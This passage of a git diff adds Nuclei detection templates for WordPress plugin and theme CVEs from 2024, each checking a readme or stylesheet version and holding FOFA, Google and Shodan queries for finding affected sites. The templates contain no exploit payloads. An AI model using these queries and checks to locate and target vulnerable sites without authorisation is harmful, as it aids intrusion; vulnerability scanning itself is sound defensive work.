+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "responsive-block-editor-addons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.8')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml b/poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml
new file mode 100644
index 0000000000..a7499e58b6
--- /dev/null
+++ b/poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688
+
+info:
+ name: >
+ Ultimate Store Kit Elementor Addons <= 1.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Ultimate Store Kit Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/51a4886b-2e15-4d91-b853-4a675120a9e9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43342
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-store-kit/"
+ google-query: inurl:"/wp-content/plugins/ultimate-store-kit/"
+ shodan-query: 'vuln:CVE-2024-43342'
+ tags: cve,wordpress,wp-plugin,ultimate-store-kit,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-store-kit/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-store-kit"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml b/poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml
new file mode 100644
index 0000000000..d721e7a28a
--- /dev/null
+++ b/poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070
+
+info:
+ name: >
+ Icegram <= 3.1.25 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Icegram plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.1.25 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/230f40c1-a8a9-4932-a3f1-ecddc52acca9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43344
+ metadata:
+ fofa-query: "wp-content/plugins/icegram/"
+ google-query: inurl:"/wp-content/plugins/icegram/"
+ shodan-query: 'vuln:CVE-2024-43344'
+ tags: cve,wordpress,wp-plugin,icegram,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "icegram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.25')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml b/poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml
new file mode 100644
index 0000000000..dd07e41c9f
--- /dev/null
+++ b/poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43345-818187bf525840885c083c5886f89859
+
+info:
+ name: >
+ Landing Page Builder <= 1.5.2.0 - Authenticated (Editor+) Local File Inlcusion
+ author: topscoder
+ severity: low
+ description: >
+ The Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.2.0. This makes it possible for authenticated attackers, with Editor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/bacfa993-2fc1-43bc-b4f0-f463ba28b4ed?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.2
+ cve-id: CVE-2024-43345
+ metadata:
+ fofa-query: "wp-content/plugins/page-builder-add/"
+ google-query: inurl:"/wp-content/plugins/page-builder-add/"
+ shodan-query: 'vuln:CVE-2024-43345'
+ tags: cve,wordpress,wp-plugin,page-builder-add,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/page-builder-add/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "page-builder-add"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.2.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml b/poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml
new file mode 100644
index 0000000000..7adb4431f7
--- /dev/null
+++ b/poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1
+
+info:
+ name: >
+ Modal Window <= 6.0.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Modal Window plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 6.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7790777d-9421-48c6-b789-f1feab109ec7?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43346
+ metadata:
+ fofa-query: "wp-content/plugins/modal-window/"
+ google-query: inurl:"/wp-content/plugins/modal-window/"
+ shodan-query: 'vuln:CVE-2024-43346'
+ tags: cve,wordpress,wp-plugin,modal-window,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/modal-window/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "modal-window"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.0.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml b/poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml
new file mode 100644
index 0000000000..02dfd90866
--- /dev/null
+++ b/poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06
+
+info:
+ name: >
+ Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Purity Of Soul theme for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43348
+ metadata:
+ fofa-query: "wp-content/themes/purity-of-soul/"
+ google-query: inurl:"/wp-content/themes/purity-of-soul/"
+ shodan-query: 'vuln:CVE-2024-43348'
+ tags: cve,wordpress,wp-theme,purity-of-soul,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "purity-of-soul"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml b/poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml
new file mode 100644
index 0000000000..58f0938e8a
--- /dev/null
+++ b/poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3
+
+info:
+ name: >
+ Propovoice CRM <= 1.7.6.4 - Unauthenticated Insecure Direct Object Reference
+ author: topscoder
+ severity: medium
+ description: >
+ The Propovoice: All-in-One Client Management System plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.7.6.4 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/25acd3d9-0c1a-426e-b670-b842f031bdc5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-43350
+ metadata:
+ fofa-query: "wp-content/plugins/propovoice/"
+ google-query: inurl:"/wp-content/plugins/propovoice/"
+ shodan-query: 'vuln:CVE-2024-43350'
+ tags: cve,wordpress,wp-plugin,propovoice,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/propovoice/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "propovoice"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.7.6.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml b/poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml
new file mode 100644
index 0000000000..c90099f47f
--- /dev/null
+++ b/poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4
+
+info:
+ name: >
+ GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The GivingPress Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43352
+ metadata:
+ fofa-query: "wp-content/themes/givingpress-lite/"
+ google-query: inurl:"/wp-content/themes/givingpress-lite/"
+ shodan-query: 'vuln:CVE-2024-43352'
+ tags: cve,wordpress,wp-theme,givingpress-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "givingpress-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml b/poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml
new file mode 100644
index 0000000000..d0fe243400
--- /dev/null
+++ b/poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5
+
+info:
+ name: >
+ myCred <= 2.7.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The myCred plugin for WordPress is vulnerable to Stored Cross-Site Scripting via wrapper attribute in versions up to, and including, 2.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69695e2e-2086-4d50-8518-0b2f5ab9ea56?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43353
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-43353'
+ tags: cve,wordpress,wp-plugin,mycred,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml b/poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml
new file mode 100644
index 0000000000..3c3e731a8d
--- /dev/null
+++ b/poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb
+
+info:
+ name: >
+ myCred <= 2.7.2 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.7.2 via deserialization of untrusted input from the 'data' parameter This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-43354
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-43354'
+ tags: cve,wordpress,wp-plugin,mycred,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml b/poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml
new file mode 100644
index 0000000000..43348020dd
--- /dev/null
+++ b/poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138
+
+info:
+ name: >
+ Piotnet Addons For Elementor <= 2.4.30 - Authenticated (Contributor+) Stored Cross-Site Scripting via Multiple Widgets
+ author: topscoder
+ severity: low
+ description: >
+ The Piotnet Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Accordion, Dual Heading, and Vertical Timeline widgets in all versions up to, and including, 2.4.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/921616e4-2b66-4847-869a-90c1c459685f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5502
+ metadata:
+ fofa-query: "wp-content/plugins/piotnet-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/piotnet-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-5502'
+ tags: cve,wordpress,wp-plugin,piotnet-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/piotnet-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "piotnet-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.30')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-5583.yaml b/poc/cve/CVE-2024-5583.yaml
new file mode 100644
index 0000000000..19e4d4f0ca
--- /dev/null
+++ b/poc/cve/CVE-2024-5583.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-5583
+
+info:
+ name: >
+ The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce <= 5.6.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Testimonials Widget Settings
+ author: topscoder
+ severity: low
+ description: >
+ The The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the carousel_direction parameter of testimonials widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/55981e72-8d1a-4075-a372-6bddc95e99d8?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-5583
+ metadata:
+ fofa-query: "wp-content/plugins/the-plus-addons-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/the-plus-addons-for-elementor-page-builder/"
+ shodan-query: 'vuln:CVE-2024-5583'
+ tags: cve,wordpress,wp-plugin,the-plus-addons-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/the-plus-addons-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "the-plus-addons-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.6.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6386.yaml b/poc/cve/CVE-2024-6386.yaml
new file mode 100644
index 0000000000..e3f74ebcea
--- /dev/null
+++ b/poc/cve/CVE-2024-6386.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6386
+
+info:
+ name: >
+ WPML Multilingual CMS <= 4.6.12 - Authenticated(Contributor+) Remote Code Execution via Twig Server-Side Template Injection
+ author: topscoder
+ severity: low
+ description: >
+ The WPML plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.6.12 via the Twig Server-Side Template Injection. This is due to missing input validation and sanitization on the render function. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f7fc91cc-e529-4362-8269-bf7ee0766e1e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 9.9
+ cve-id: CVE-2024-6386
+ metadata:
+ fofa-query: "wp-content/plugins/sitepress-multilingual-cms/"
+ google-query: inurl:"/wp-content/plugins/sitepress-multilingual-cms/"
+ shodan-query: 'vuln:CVE-2024-6386'
+ tags: cve,wordpress,wp-plugin,sitepress-multilingual-cms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/sitepress-multilingual-cms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "sitepress-multilingual-cms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.6.12')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-6870.yaml b/poc/cve/CVE-2024-6870.yaml
new file mode 100644
index 0000000000..5f5e2ffe58
--- /dev/null
+++ b/poc/cve/CVE-2024-6870.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-6870
+
+info:
+ name: >
+ Responsive Lightbox & Gallery <= 2.4.7 - Authenticated (Author+) Stored Cross-Site Scripting via File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Responsive Lightbox & Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.4.7 due to insufficient input sanitization and output escaping affecting the rl_upload_image AJAX endpoint. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the 3gp2 file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e4d55309-d178-4b3d-9de6-2cf2769b76fe?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-6870
+ metadata:
+ fofa-query: "wp-content/plugins/responsive-lightbox/"
+ google-query: inurl:"/wp-content/plugins/responsive-lightbox/"
+ shodan-query: 'vuln:CVE-2024-6870'
+ tags: cve,wordpress,wp-plugin,responsive-lightbox,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/responsive-lightbox/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "responsive-lightbox"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml b/poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml
new file mode 100644
index 0000000000..442d7d073b
--- /dev/null
+++ b/poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5
+
+info:
+ name: >
+ WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary File Deletion
+ author: topscoder
+ severity: low
+ description: >
+ The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wppfm_removeFeedFile' function in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-7258
+ metadata:
+ fofa-query: "wp-content/plugins/wp-product-feed-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/"
+ shodan-query: 'vuln:CVE-2024-7258'
+ tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt"
+
+ extractors:
